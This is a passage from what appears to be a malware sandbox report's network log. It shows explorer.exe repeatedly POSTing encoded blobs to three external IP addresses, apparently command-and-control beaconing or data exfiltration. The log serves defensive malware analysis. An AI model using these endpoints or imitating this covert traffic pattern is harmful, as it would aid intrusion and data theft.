2024-07-27 05:32:08 UTC	685	IN	Data Raw: 42 67 6f 59 62 42 75 41 30 79 68 63 48 73 38 68 75 63 32 31 69 66 38 47 32 35 49 43 36 37 39 76 45 74 77 53 6b 6c 71 6a 6a 4b 4f 70 46 30 39 6c 56 33 41 76 4b 72 6f 50 79 39 50 47 64 68 5a 65 51 4e 31 32 6d 4f 43 53 65 4c 47 77 46 33 65 37 6e 61 55 41 30 4f 56 38 61 63 45 49 72 59 4a 35 6e 6e 44 44 68 4a 59 39 61 6a 67 54 72 4e 79 72 7a 51 38 51 61 68 64 2b 4a 4c 43 38 4d 4d 31 58 6d 48 42 41 34 75 69 4d 54 54 41 73 34 41 4a 62 43 70 6a 74 43 6c 6a 30 4b 67 73 6e 4e 7a 72 66 4c 6d 30 76 50 53 53 39 6e 43 36 74 4c 51 6c 48 49 5a 44 4a 4b 61 49 45 64 31 61 56 41 57 48 68 33 2f 61 39 50 4b 66 61 6a 44 6f 5a 74 30 66 56 34 59 77 75 75 36 33 65 4d 53 42 2f 72 6c 66 37 64 54 30 46 73 56 44 2b 56 56 53 31 69 35 74 7a 70 79 6c 71 4d 38 67 41 38 76 52 63 55 53 4a Data Ascii: BgoYbBuA0yhcHs8huc21if8G25IC679vEtwSklqjjKOpF09lV3AvKroPy9PGdhZeQN12mOCSeLGwF3e7naUA0OV8acEIrYJ5nnDDhJY9ajgTrNyrzQ8Qahd+JLC8MM1XmHBA4uiMTTAs4AJbCpjtClj0KgsnNzrfLm0vPSS9nC6tLQlHIZDJKaIEd1aVAWHh3/a9PKfajDoZt0fV4Ywuu63eMSB/rlf7dT0FsVD+VVS1i5tzpylqM8gA8vRcUSJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	51893	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:08 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:08 UTC	1122	OUT	Data Raw: 55 78 34 37 71 57 44 63 43 33 67 50 46 65 73 33 43 36 74 52 6e 2b 71 39 72 6a 63 62 50 75 79 35 6c 72 4b 36 39 30 42 50 79 7a 75 76 47 64 61 77 2f 59 73 4a 70 54 4c 30 75 6e 6e 45 4c 41 33 59 64 57 44 58 61 55 56 46 55 36 6e 44 75 4f 41 32 35 46 68 36 46 36 4e 74 45 59 2f 5a 6c 47 6f 33 34 4b 43 2b 71 65 36 78 32 62 48 70 36 38 38 57 58 45 64 68 30 68 79 32 6f 69 4e 54 33 68 68 4e 53 54 6a 6c 55 63 5a 2b 55 4f 51 41 6a 54 47 6e 63 76 76 58 51 6a 53 4d 69 58 33 6e 58 52 63 57 4e 66 77 49 66 34 64 52 4b 34 70 35 34 78 4f 32 59 63 4b 37 30 31 62 44 73 57 4f 6a 48 6b 35 47 73 41 74 44 50 36 37 6f 4f 72 6c 64 54 79 6a 79 48 6a 74 64 59 32 37 52 6b 2b 38 2b 51 31 31 36 2b 36 75 74 43 64 48 69 43 58 7a 75 58 74 4d 50 4a 65 71 4f 50 43 38 34 34 73 74 54 47 51 65 Data Ascii: Ux47qWDcC3gPFes3C6tRn+q9rjcbPuy5lrK690BPyzuvGdaw/YsJpTL0unnELA3YdWDXaUVFU6nDuOA25Fh6F6NtEY/ZlGo34KC+qe6x2bHp688WXEdh0hy2oiNT3hhNSTjlUcZ+UOQAjTGncvvXQjSMiX3nXRcWNfwIf4dRK4p54xO2YcK701bDsWOjHk5GsAtDP67oOrldTyjyHjtdY27Rk+8+Q116+6utCdHiCXzuXtMPJeqOPC844stTGQe
2024-07-27 05:32:09 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:09 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:09 UTC	685	IN	Data Raw: 6f 30 55 33 36 74 5a 4e 34 6f 37 2b 49 79 75 6c 6e 73 6c 73 4d 4c 49 63 41 45 37 48 34 67 59 41 74 52 56 4e 2f 7a 6b 44 2f 46 63 51 68 38 79 73 43 69 46 62 2b 7a 71 44 72 58 63 71 66 71 2b 51 6b 30 33 33 49 6d 70 6a 48 73 33 53 61 79 79 63 6b 4f 63 69 54 2b 38 2b 67 6c 32 47 64 59 39 49 2f 5a 4a 7a 55 6a 47 4d 6d 37 6e 34 73 37 44 7a 77 46 6d 53 57 63 77 52 6f 6f 6a 38 4b 45 71 49 33 42 74 4e 31 58 4d 77 55 76 64 59 6d 41 77 77 73 73 61 39 49 66 66 74 4f 41 43 62 4c 34 7a 55 58 55 33 69 70 4d 4c 68 62 4c 79 55 67 31 54 2f 39 77 76 6b 33 57 43 43 58 6a 67 32 61 4e 70 62 4e 64 64 57 2b 53 33 64 39 48 43 71 6c 34 6f 47 56 7a 59 64 71 56 30 50 36 4a 78 50 30 36 34 54 46 6c 75 61 42 4b 4b 4d 31 51 42 46 79 59 52 76 51 57 53 32 64 6b 71 32 5a 58 35 49 55 69 55 Data Ascii: o0U36tZN4o7+IyulnslsMLIcAE7H4gYAtRVN/zkD/FcQh8ysCiFb+zqDrXcqfq+Qk033ImpjHs3SayyckOciT+8+gl2GdY9I/ZJzUjGMm7n4s7DzwFmSWcwRooj8KEqI3BtN1XMwUvdYmAwwssa9IfftOACbL4zUXU3ipMLhbLyUg1T/9wvk3WCCXjg2aNpbNddW+S3d9HCql4oGVzYdqV0P6JxP064TFluaBKKM1QBFyYRvQWS2dkq2ZX5IUiU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	51894	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:10 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:10 UTC	1122	OUT	Data Raw: 41 52 30 33 6e 76 52 6f 61 4e 4c 6f 47 54 2f 34 64 61 4b 69 78 7a 39 43 46 36 68 75 66 6a 76 65 79 54 6c 49 74 71 49 57 5a 73 63 46 33 6e 6d 64 6e 43 49 4c 32 6d 62 4e 6e 67 69 32 54 6b 2b 49 5a 7a 74 77 4e 52 32 58 74 4d 69 52 31 46 57 39 64 7a 34 74 63 62 44 67 4f 38 42 68 67 2f 4a 65 6a 64 70 7a 37 4d 47 79 63 5a 2f 48 36 59 63 38 44 38 4f 2f 41 4d 44 4b 2b 35 6e 50 73 52 63 56 5a 66 4b 74 72 55 61 42 78 46 56 5a 71 47 41 67 31 35 2b 6c 4e 62 62 56 61 46 56 2b 6c 6a 77 73 79 67 37 73 55 4b 4b 36 72 5a 64 36 70 48 57 52 7a 71 51 76 33 67 4f 6c 71 39 38 55 32 7a 6a 79 73 6d 4e 2b 52 74 4a 73 43 46 54 74 69 33 67 4d 2b 4c 30 66 54 32 39 63 7a 74 66 4b 78 59 4e 43 38 6a 2b 49 43 48 2f 31 70 2b 6a 2b 54 41 77 77 42 68 6c 61 50 68 39 64 5a 30 74 6a 39 66 51 Data Ascii: AR03nvRoaNLoGT/4daKixz9CF6hufjveyTlItqIWZscF3nmdnCIL2mbNngi2Tk+IZztwNR2XtMiR1FW9dz4tcbDgO8Bhg/Jejdpz7MGycZ/H6Yc8D8O/AMDK+5nPsRcVZfKtrUaBxFVZqGAg15+lNbbVaFV+ljwsyg7sUKK6rZd6pHWRzqQv3gOlq98U2zjysmN+RtJsCFTti3gM+L0fT29cztfKxYNC8j+ICH/1p+j+TAwwBhlaPh9dZ0tj9fQ
2024-07-27 05:32:12 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:12 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:12 UTC	685	IN	Data Raw: 6d 79 4b 75 2f 43 6f 4e 58 50 43 73 55 63 54 6a 51 72 77 41 69 43 38 6d 4c 5a 6c 32 74 68 72 38 43 78 46 2f 66 64 39 4b 4e 38 4d 6f 68 6d 72 6c 6c 6b 32 6a 4d 36 55 7a 53 52 49 30 4a 6d 51 50 4c 31 6b 76 7a 48 74 79 49 4b 79 6f 35 62 6f 4d 4d 31 4b 44 4c 47 4a 57 70 37 6f 63 34 78 42 36 36 73 57 69 45 71 6f 46 64 73 61 6e 74 79 46 36 54 32 78 30 6e 76 78 68 32 66 48 33 6a 75 71 5a 38 4e 79 2f 6d 7a 6b 72 4e 61 71 6c 62 46 45 4d 63 34 42 38 58 39 6f 45 45 34 77 6e 42 34 61 6f 55 52 33 77 57 57 75 58 5a 61 57 4b 39 55 38 35 77 36 43 52 5a 33 71 70 69 51 4c 6d 37 57 68 50 77 65 35 30 4a 45 76 45 4f 76 65 54 5a 32 67 69 68 30 34 6e 67 37 75 67 41 6c 47 34 5a 5a 64 62 42 30 4d 6c 65 78 43 57 6d 41 6b 6f 44 59 71 48 7a 6b 63 39 45 67 59 55 33 49 6e 53 6f 4e 6b Data Ascii: myKu/CoNXPCsUcTjQrwAiC8mLZl2thr8CxF/fd9KN8Mohmrllk2jM6UzSRI0JmQPL1kvzHtyIKyo5boMM1KDLGJWp7oc4xB66sWiEqoFdsantyF6T2x0nvxh2fH3juqZ8Ny/mzkrNaqlbFEMc4B8X9oEE4wnB4aoUR3wWWuXZaWK9U85w6CRZ3qpiQLm7WhPwe50JEvEOveTZ2gih04ng7ugAlG4ZZdbB0MlexCWmAkoDYqHzkc9EgYU3InSoNk

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	51896	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:12 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:12 UTC	1122	OUT	Data Raw: 52 76 39 76 55 41 43 68 4b 4f 48 66 57 36 51 76 4e 6e 4e 75 61 72 77 39 6c 79 35 45 4c 64 55 2b 37 61 31 4a 53 63 48 6e 53 45 6d 69 78 43 7a 35 4b 56 50 52 4b 56 30 6a 49 62 4e 58 6c 2b 5a 77 77 30 75 67 2f 36 76 63 4a 46 53 70 46 37 2b 44 4f 76 71 33 37 43 57 49 7a 31 76 5a 58 63 74 77 63 48 30 54 64 67 2f 6d 33 53 63 47 56 73 64 62 34 36 4d 74 69 4b 34 31 66 74 68 77 2f 6f 43 59 75 54 79 68 55 33 30 43 44 31 76 56 55 45 4e 2f 63 4d 57 54 74 6a 75 2b 70 65 48 34 69 49 66 55 36 78 47 67 54 6f 6c 4e 2f 35 67 56 4d 56 31 39 6d 65 77 59 6c 4e 68 68 49 73 2f 63 42 31 53 67 54 73 4e 61 7a 52 6f 59 57 51 65 6a 6d 47 51 31 56 49 35 58 47 6b 36 2b 4f 68 54 6c 32 50 35 77 57 44 79 2f 36 55 4a 58 38 39 6f 32 52 75 6d 64 47 35 33 42 74 56 73 6a 41 64 46 77 6e 64 4d Data Ascii: Rv9vUAChKOHfW6QvNnNuarw9ly5ELdU+7a1JScHnSEmixCz5KVPRKV0jIbNXl+Zww0ug/6vcJFSpF7+DOvq37CWIz1vZXctwcH0Tdg/m3ScGVsdb46MtiK41fthw/oCYuTyhU30CD1vVUEN/cMWTtju+peH4iIfU6xGgTolN/5gVMV19mewYlNhhIs/cB1SgTsNazRoYWQejmGQ1VI5XGk6+OhTl2P5wWDy/6UJX89o2RumdG53BtVsjAdFwndM
2024-07-27 05:32:14 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:14 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:14 UTC	685	IN	Data Raw: 71 49 38 56 66 4d 6b 54 5a 34 64 38 55 6e 45 2f 5a 47 70 79 6b 35 62 73 4d 44 6d 37 76 75 38 30 2b 67 71 6f 57 44 44 41 4c 43 57 69 75 6d 2f 4f 45 55 38 49 55 64 31 32 63 37 76 54 53 52 36 73 7a 56 78 30 50 6b 2f 73 6a 68 5a 69 69 4c 50 62 68 79 38 30 63 61 58 43 52 68 4d 51 56 6d 4e 34 32 4d 43 77 31 6f 67 6a 47 39 6f 45 36 6d 36 41 67 6d 58 39 73 59 4f 59 35 4c 42 4d 77 39 41 31 30 4a 74 2f 6d 52 4a 73 63 33 6e 70 4b 44 58 4f 6e 7a 64 75 6b 34 30 67 48 56 54 67 32 42 2b 4c 31 48 51 50 47 42 32 78 55 41 4d 43 7a 4d 75 51 71 49 34 6b 69 31 50 66 76 53 52 58 69 79 6a 4d 78 50 2b 5a 64 38 42 4d 47 57 54 65 6e 34 73 36 4e 79 74 7a 36 65 76 69 4e 58 2b 52 47 4c 73 4a 2b 46 47 56 35 46 49 63 58 44 2b 66 49 30 45 65 54 35 75 56 51 4c 36 62 49 4d 71 2b 72 6d 6a Data Ascii: qI8VfMkTZ4d8UnE/ZGpyk5bsMDm7vu80+gqoWDDALCWium/OEU8IUd12c7vTSR6szVx0Pk/sjhZiiLPbhy80caXCRhMQVmN42MCw1ogjG9oE6m6AgmX9sYOY5LBMw9A10Jt/mRJsc3npKDXOnzduk40gHVTg2B+L1HQPGB2xUAMCzMuQqI4ki1PfvSRXiyjMxP+Zd8BMGWTen4s6Nytz6eviNX+RGLsJ+FGV5FIcXD+fI0EeT5uVQL6bIMq+rmj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	51897	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:15 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:15 UTC	1122	OUT	Data Raw: 4d 57 68 79 6c 73 75 61 6f 7a 48 4b 63 71 4d 34 41 37 4e 36 47 66 6e 70 6a 64 30 6f 57 66 6e 37 43 51 79 39 51 51 4c 44 4c 65 66 64 66 50 39 46 78 52 33 59 4f 44 4c 42 42 69 4e 65 61 47 67 45 48 33 59 55 73 42 46 53 70 36 57 4a 30 34 69 36 71 69 79 67 4c 55 68 62 33 77 50 54 64 65 50 54 6b 73 53 74 61 79 41 77 30 72 48 30 4c 7a 64 67 79 51 4f 44 46 52 67 78 4f 49 76 4c 2b 42 36 78 6a 75 43 74 30 37 44 49 42 50 41 76 64 55 45 66 59 79 6c 4b 57 4e 46 75 7a 4a 4f 6d 38 74 61 70 41 44 30 53 34 57 52 56 48 6c 32 39 6f 79 4a 75 66 79 54 49 39 46 47 63 78 4d 4f 33 52 4f 4f 53 75 37 71 6f 50 77 72 51 50 77 57 66 58 63 79 6f 76 56 4f 39 62 69 73 68 49 49 79 4d 78 45 6d 4d 2f 54 64 4d 61 74 52 74 63 6a 54 57 79 56 43 4a 44 68 64 44 74 5a 78 4e 58 49 34 35 35 6a 43 Data Ascii: MWhylsuaozHKcqM4A7N6Gfnpjd0oWfn7CQy9QQLDLefdfP9FxR3YODLBBiNeaGgEH3YUsBFSp6WJ04i6qiygLUhb3wPTdePTksStayAw0rH0LzdgyQODFRgxOIvL+B6xjuCt07DIBPAvdUEfYylKWNFuzJOm8tapAD0S4WRVHl29oyJufyTI9FGcxMO3ROOSu7qoPwrQPwWfXcyovVO9bishIIyMxEmM/TdMatRtcjTWyVCJDhdDtZxNXI455jC
2024-07-27 05:32:16 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:15 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:16 UTC	685	IN	Data Raw: 4c 6b 57 2b 51 32 74 2f 78 72 57 65 64 33 54 31 71 57 6c 52 45 56 4b 35 4c 2b 63 51 50 61 36 4c 49 59 65 4a 47 63 66 58 63 4e 5a 4e 47 46 64 47 66 77 68 43 74 79 50 6c 39 41 34 66 69 63 55 77 74 45 49 58 72 46 41 75 77 4f 51 59 66 48 69 66 46 45 75 2b 34 6f 70 65 62 5a 67 35 73 4e 7a 46 76 79 70 33 4a 63 34 53 74 48 31 36 38 34 78 78 56 44 6f 4f 35 6a 6b 78 70 78 73 64 37 61 41 59 42 62 72 74 78 4f 79 72 56 6a 37 48 67 78 59 63 30 7a 46 5a 70 30 52 4c 6f 77 32 36 34 63 57 65 58 69 41 72 55 4a 31 31 4f 36 68 66 74 6d 71 69 61 58 2f 5a 76 4e 77 65 33 61 68 5a 6b 75 56 66 62 7a 4c 37 6c 49 54 59 58 7a 74 39 39 59 49 33 39 42 4a 79 4e 79 64 53 32 33 64 31 43 66 4e 6d 38 68 39 51 33 7a 64 53 64 36 30 30 30 77 4e 66 6c 4e 72 4e 6a 55 66 52 36 33 79 75 74 6f 65 Data Ascii: LkW+Q2t/xrWed3T1qWlREVK5L+cQPa6LIYeJGcfXcNZNGFdGfwhCtyPl9A4ficUwtEIXrFAuwOQYfHifFEu+4opebZg5sNzFvyp3Jc4StH1684xxVDoO5jkxpxsd7aAYBbrtxOyrVj7HgxYc0zFZp0RLow264cWeXiArUJ11O6hftmqiaX/ZvNwe3ahZkuVfbzL7lITYXzt99YI39BJyNydS23d1CfNm8h9Q3zdSd6000wNflNrNjUfR63yutoe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	51898	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:16 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:32:16 UTC	1267	OUT	Data Raw: 59 41 71 41 44 57 68 50 4b 4e 2b 51 2f 78 54 4c 69 69 54 68 5a 77 72 68 64 38 49 4a 42 55 63 5a 6f 38 49 31 48 6e 4d 4b 79 2f 75 4d 50 66 53 54 43 57 4d 7a 61 65 79 30 39 2f 75 69 71 30 2b 2f 51 44 2b 38 61 50 4b 65 6e 6d 4b 54 69 46 51 6b 61 6b 46 4c 43 38 58 79 6f 69 74 4a 4a 4d 4e 78 30 44 67 38 61 4c 53 38 4a 72 45 4a 36 66 69 41 53 34 6f 63 4f 67 4b 6c 46 5a 42 54 77 33 46 79 61 78 45 46 6d 4c 6f 4b 46 57 56 43 6f 50 69 30 43 75 47 37 30 6c 42 62 5a 77 45 42 6b 36 59 38 74 56 4d 4a 6f 4d 45 49 57 57 30 63 6b 61 6c 4e 46 46 75 44 70 59 67 70 30 35 69 4f 38 39 48 75 4b 77 35 45 57 6c 56 6c 36 47 43 5a 39 6d 2f 54 6e 48 2f 41 34 6b 32 4d 64 43 79 5a 58 76 76 4b 58 71 6e 62 57 4e 66 36 2f 76 4f 37 70 74 79 36 38 42 6a 76 37 65 42 46 51 2b 37 68 77 2f 2b Data Ascii: YAqADWhPKN+Q/xTLiiThZwrhd8IJBUcZo8I1HnMKy/uMPfSTCWMzaey09/uiq0+/QD+8aPKenmKTiFQkakFLC8XyoitJJMNx0Dg8aLS8JrEJ6fiAS4ocOgKlFZBTw3FyaxEFmLoKFWVCoPi0CuG70lBbZwEBk6Y8tVMJoMEIWW0ckalNFFuDpYgp05iO89HuKw5EWlVl6GCZ9m/TnH/A4k2MdCyZXvvKXqnbWNf6/vO7pty68Bjv7eBFQ+7hw/+
2024-07-27 05:32:17 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:17 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:17 UTC	685	IN	Data Raw: 69 2b 63 34 72 55 33 72 53 61 35 43 69 5a 68 44 6b 59 30 67 75 2b 57 42 30 6c 50 53 68 42 69 67 30 62 75 7a 6a 6f 6b 4a 2b 71 43 4c 6e 4e 46 75 43 57 58 44 45 2f 44 47 53 6e 2b 33 73 56 37 67 59 6b 44 4b 38 34 61 2f 70 61 43 46 36 55 58 41 65 66 39 4c 51 55 73 76 77 64 46 4b 59 4e 44 59 4f 61 2b 34 6c 59 78 78 38 64 7a 65 6b 34 53 49 52 53 72 79 63 42 75 54 32 61 67 54 2f 6e 49 2b 42 4c 57 6a 32 45 43 79 4b 2b 41 6c 67 62 70 47 66 4f 53 56 7a 64 6e 72 53 5a 73 75 39 6a 6f 4a 6b 45 2f 67 62 6d 42 6e 58 4f 31 2b 74 63 4e 7a 53 33 63 6c 6a 4a 56 68 55 4f 4b 32 70 67 6d 55 62 6b 42 63 50 49 2f 33 58 4a 47 79 35 41 4e 30 69 6d 77 63 68 50 4d 67 57 6d 64 75 35 48 36 6a 78 38 2b 6f 51 71 46 65 4a 61 73 45 54 73 51 59 41 34 45 59 37 69 2f 5a 66 48 2b 33 30 2b 41 Data Ascii: i+c4rU3rSa5CiZhDkY0gu+WB0lPShBig0buzjokJ+qCLnNFuCWXDE/DGSn+3sV7gYkDK84a/paCF6UXAef9LQUsvwdFKYNDYOa+4lYxx8dzek4SIRSrycBuT2agT/nI+BLWj2ECyK+AlgbpGfOSVzdnrSZsu9joJkE/gbmBnXO1+tcNzS3cljJVhUOK2pgmUbkBcPI/3XJGy5AN0imwchPMgWmdu5H6jx8+oQqFeJasETsQYA4EY7i/ZfH+30+A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	51899	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:18 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:18 UTC	1122	OUT	Data Raw: 67 6d 72 44 61 37 44 62 67 4a 6e 76 66 75 2b 2b 61 4c 6c 4c 79 31 65 5a 30 42 36 36 2f 79 6a 48 57 44 57 4a 50 31 41 36 7a 5a 34 76 33 33 71 33 6d 42 30 37 4a 43 59 72 53 35 61 6f 76 79 32 51 48 37 73 6e 57 4a 66 2f 55 34 4f 32 39 33 67 6f 41 6a 59 54 6d 34 61 41 52 52 52 75 52 5a 45 54 36 4a 65 2f 45 35 48 64 63 48 4e 71 5a 73 54 78 62 2f 67 54 69 4e 43 4c 30 48 70 72 37 34 6c 44 64 68 59 45 6b 6f 64 76 74 38 7a 35 2b 70 31 68 63 36 68 59 62 41 6f 36 47 32 72 30 33 54 61 66 35 35 70 6f 67 70 4a 73 68 68 4d 56 51 61 53 46 2f 4b 5a 47 78 52 45 71 6b 54 70 71 2f 61 70 59 41 4c 67 49 45 58 36 48 63 58 52 67 5a 61 66 66 31 63 6f 37 61 52 63 65 69 6d 5a 77 52 6b 6c 34 43 66 32 37 6b 53 4a 37 2f 70 47 45 52 52 37 33 66 39 49 51 6b 4d 55 41 69 4e 4b 42 44 42 72 Data Ascii: gmrDa7DbgJnvfu++aLlLy1eZ0B66/yjHWDWJP1A6zZ4v33q3mB07JCYrS5aovy2QH7snWJf/U4O293goAjYTm4aARRRuRZET6Je/E5HdcHNqZsTxb/gTiNCL0Hpr74lDdhYEkodvt8z5+p1hc6hYbAo6G2r03Taf55pogpJshhMVQaSF/KZGxREqkTpq/apYALgIEX6HcXRgZaff1co7aRceimZwRkl4Cf27kSJ7/pGERR73f9IQkMUAiNKBDBr
2024-07-27 05:32:20 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:20 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:20 UTC	685	IN	Data Raw: 5a 49 6a 69 33 76 37 37 34 70 59 32 4a 77 30 58 6b 30 31 41 34 36 37 52 75 6d 65 6d 66 58 4c 5a 4d 66 37 4a 66 63 6b 55 44 59 47 45 4e 78 49 74 56 4d 62 62 74 36 57 49 79 68 4a 4a 77 7a 68 2b 46 69 79 6f 52 46 49 76 69 53 32 42 57 6e 76 44 69 71 44 59 59 65 4c 51 64 38 62 71 79 61 4e 32 2b 59 30 67 45 64 43 46 6b 4f 39 4f 69 71 6c 48 54 61 4b 4f 43 72 56 65 6c 44 74 64 4e 47 67 6a 68 46 46 38 4b 4f 77 5a 43 61 55 57 62 42 32 73 79 54 32 46 66 47 45 79 6e 34 5a 64 45 4c 71 7a 45 50 42 6f 6c 44 35 4e 61 70 68 66 76 38 2b 43 5a 64 69 64 36 79 4c 35 4d 5a 50 51 52 69 67 53 36 53 55 6a 44 52 46 66 42 64 78 37 56 55 6c 77 47 69 61 4b 70 5a 32 64 31 33 53 6a 57 66 75 57 64 6a 45 69 76 73 6b 71 32 6e 68 6c 30 48 57 53 78 59 30 4f 36 64 6d 72 50 58 32 63 71 72 31 Data Ascii: ZIji3v774pY2Jw0Xk01A467RumemfXLZMf7JfckUDYGENxItVMbbt6WIyhJJwzh+FiyoRFIviS2BWnvDiqDYYeLQd8bqyaN2+Y0gEdCFkO9OiqlHTaKOCrVelDtdNGgjhFF8KOwZCaUWbB2syT2FfGEyn4ZdELqzEPBolD5Naphfv8+CZdid6yL5MZPQRigS6SUjDRFfBdx7VUlwGiaKpZ2d13SjWfuWdjEivskq2nhl0HWSxY0O6dmrPX2cqr1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	51900	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:20 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:20 UTC	1122	OUT	Data Raw: 59 79 75 31 2b 38 38 75 6c 79 6c 4f 4b 46 75 58 39 74 74 69 6f 45 77 73 38 41 41 34 67 71 5a 32 41 70 4d 6a 46 59 4b 4c 47 42 72 37 51 56 37 51 4c 5a 36 65 5a 75 32 31 2b 57 32 30 59 6e 6f 64 65 33 70 47 79 4b 53 54 67 35 53 65 77 32 39 57 55 70 59 71 62 59 36 4b 58 73 74 57 4f 70 63 59 75 77 6a 34 37 42 4f 79 68 44 72 6c 77 2b 6e 53 6e 54 76 31 79 76 33 79 52 69 2f 79 56 6a 67 67 33 77 4c 41 71 58 78 51 48 51 58 69 6b 71 6e 4a 74 45 43 44 56 30 48 66 56 42 72 2b 37 75 57 7a 4f 4e 78 78 62 6e 6c 45 76 6d 71 57 4c 4b 4e 38 75 52 58 44 48 65 62 52 6c 31 48 71 4c 37 39 57 57 77 58 58 45 4d 68 45 59 62 59 41 57 67 33 62 6b 78 53 58 70 63 63 6c 34 74 41 5a 62 50 38 67 4e 34 33 6f 65 36 45 67 6d 48 32 6d 6a 31 38 6b 59 51 51 73 4d 75 51 76 59 50 52 37 79 44 6d Data Ascii: Yyu1+88ulylOKFuX9ttioEws8AA4gqZ2ApMjFYKLGBr7QV7QLZ6eZu21+W20Ynode3pGyKSTg5Sew29WUpYqbY6KXstWOpcYuwj47BOyhDrlw+nSnTv1yv3yRi/yVjgg3wLAqXxQHQXikqnJtECDV0HfVBr+7uWzONxxbnlEvmqWLKN8uRXDHebRl1HqL79WWwXXEMhEYbYAWg3bkxSXpccl4tAZbP8gN43oe6EgmH2mj18kYQQsMuQvYPR7yDm
2024-07-27 05:32:21 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:21 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:21 UTC	685	IN	Data Raw: 4b 33 6e 78 53 46 42 44 45 49 7a 57 6e 51 53 61 6e 61 74 39 6b 52 79 37 67 6e 31 6d 6d 77 37 36 46 72 74 48 4f 73 31 6e 4d 79 30 30 56 63 33 4a 38 56 76 30 6d 43 72 77 72 55 45 43 66 47 6e 6f 74 4e 44 6f 44 56 79 74 6d 4f 48 64 7a 41 37 4b 75 46 73 42 50 42 51 4d 55 42 38 76 41 45 71 32 75 46 4b 6b 45 41 48 7a 72 2f 45 73 5a 43 47 39 65 4c 41 39 6c 69 4f 55 65 7a 64 67 41 47 4f 42 72 2b 69 6e 4e 5a 39 73 79 74 49 79 63 74 4a 75 6b 46 6a 52 74 68 33 34 6f 35 54 41 58 2f 48 57 2b 45 38 64 33 45 36 4e 30 76 44 44 65 79 68 71 6e 58 42 6b 52 6e 4f 66 41 65 6d 58 2b 4b 6b 2b 4f 63 2f 30 6f 6b 47 33 54 65 33 6d 51 64 55 71 34 41 51 71 77 32 61 4f 4c 6a 77 42 2f 76 46 61 57 6a 55 78 2b 41 44 63 58 2b 6b 39 41 63 43 67 59 47 42 69 58 70 55 39 6b 5a 57 37 33 58 55 Data Ascii: 